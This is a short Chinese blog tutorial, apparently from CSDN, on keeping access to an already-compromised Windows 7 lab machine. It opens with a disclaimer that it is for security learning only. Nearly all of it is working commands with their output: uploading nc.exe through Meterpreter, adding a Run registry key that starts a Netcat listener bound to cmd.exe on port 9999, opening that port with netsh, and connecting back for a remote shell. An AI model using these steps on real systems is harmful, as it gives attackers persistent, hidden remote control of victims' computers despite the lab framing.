本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。
首先假设已经通过Kail成功入侵靶机:https://blog.csdn.net/mshxuyi/article/details/136377760
一、通过Kail创建NC后门
1、拷贝NC到靶机
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
# 输出
[*] Uploading : /usr/share/windows-binaries/nc.exe -> c:\windows\system32\nc.exe
[*] Completed : /usr/share/windows-binaries/nc.exe -> c:\windows\system32\nc.exe2、通过注册表设置开机启动
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Netcat -d 'C:\windows\system32\nc.exe -l -d -p 9999 -e cmd.exe'
# 输出
Successfully set Netcat of REG_SZ.3、进入Shell
meterpreter > shell
# 输出
Process 1548 created.
Channel 2 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£
# 改变编码
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 650014、创建防火墙规则
C:\Windows\system32>netsh firewall add portopening TCP 9999 "Netcat" ENABLE ALL
# 输出
netsh firewall add portopening TCP 9999 "Netcat" ENABLE ALL
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
二、重启Win7靶机,并查看
1、查看开机启动项
2、查看防火墙规则
3、查看进程
三、验证后门
1、连接靶机
┌──(root?Kali)-[~]
└─# nc -v 10.3.0.234 9999
# 输出
10.3.0.234: inverse host lookup failed: Unknown host
(UNKNOWN) [10.3.0.234] 9999 (?) open
Microsoft Windows [°汾 6.1.7600]
°爨?? (c) 2009 Microsoft Corporation??±?????{??
2、查看主机名
C:\Windows\system32>hostname
# 输出
hostname
tomma-PC
3040
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
